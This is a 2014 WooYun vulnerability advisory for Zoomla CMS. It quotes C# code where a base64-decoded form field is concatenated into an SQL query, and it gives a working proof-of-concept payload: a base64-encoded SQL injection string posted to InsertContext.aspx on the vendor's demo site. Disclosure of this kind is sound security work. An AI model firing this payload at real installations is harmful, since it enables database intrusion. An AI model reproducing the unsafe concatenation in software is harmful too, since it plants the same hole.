当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-060071

漏洞标题:逐浪CMS某处编码SQL注入漏洞

相关厂商:逐浪CMS

漏洞作者: what_news

提交时间:2014-05-09 17:52

修复时间:2014-08-04 17:54

公开时间:2014-08-04 17:54

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-09: 细节已通知厂商并且等待厂商处理中
2014-05-14: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-07-08: 细节向核心白帽子及相关领域专家公开
2014-07-18: 细节向普通白帽子公开
2014-07-28: 细节向实习白帽子公开
2014-08-04: 细节向公众公开

简要描述:

逐浪cms某处编码SQL注入漏洞

详细说明:

地址

http://demo.zoomla.cn/3d/InsertContext.aspx


protected void Page_Load(object sender, EventArgs e)
{
if (base.Request.QueryString["type"] != null)
{
this.md.Caddtime = DateTime.Now;
this.md.Cadduser = this.user.GetLogin().UserName;
string s = base.Request.Form.ToString();
s = base.Server.UrlDecode(s);
try
{
s = BaseClass.FromBase64String(s); //base64转换
}
catch (Exception exception)
{
s = exception.ToString() + s;
}
if (s.IndexOf("$") > -1)
{
string[] strArray = s.Split(new char[] { '$' }, StringSplitOptions.RemoveEmptyEntries); //分割
if (base.Request.QueryString["type"].ToString() == "Suser")
{
DataTable table = this.bduser.Select_Where(" Dutype=1 and DuShow=" + strArray[1], " * ", ""); //数组第二部分没处理 存在注入
if (table.Rows.Count > 0)
{
this.md.Ctouid = DataConverter.CLng(table.Rows[0]["DUid"].ToString());
}
this.dt = this.bduser.Select_Where(" Duid=" + this.md.Ctouid, " * ", "");
if ((this.dt.Rows.Count > 0) && (this.mduser.Dislogin == 0))
{
this.mduser.Dmessage++;
}
}
else
{
this.md.Ctouid = DataConverter.CLng(strArray[1]);
this.dt = this.bduser.Select_Where(" Duid=" + this.md.Ctouid, " * ", "");
this.mduser.Dmessage++;
}
this.md.Ccontent = BaseClass.Htmlcode(strArray[0]);
this.md.ChatType = 0;
this.SetUserContext();
}
else
{
this.dt = this.bduser.Select_Where(" Duid=" + this.user.GetLogin().UserID, " * ", "");
this.md.Ccontent = BaseClass.Htmlcode(s);
this.md.ChatType = 1;
this.SetUserContext();
}
this.bd.GetInsert(this.md);
}
if (this.dt != null)
{
this.dt.Dispose();
}
}

漏洞证明:

访问

http://demo.zoomla.cn/3d/InsertContext.aspx?type=Suser


提交

YSQxIGFuZCAoc2VsZWN0IEBAdmVyc2lvbik+MCAtLQ==


这个是base64的值 原来的值是 a$1 and (select @@version)>0 --
$后面可自己构造 然后整个字符串转换为base64编码

597.png


修复方案:

对参数进行处理

版权声明:转载请注明来源 what_news@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-08-04 17:54

厂商回复:

最新状态:

暂无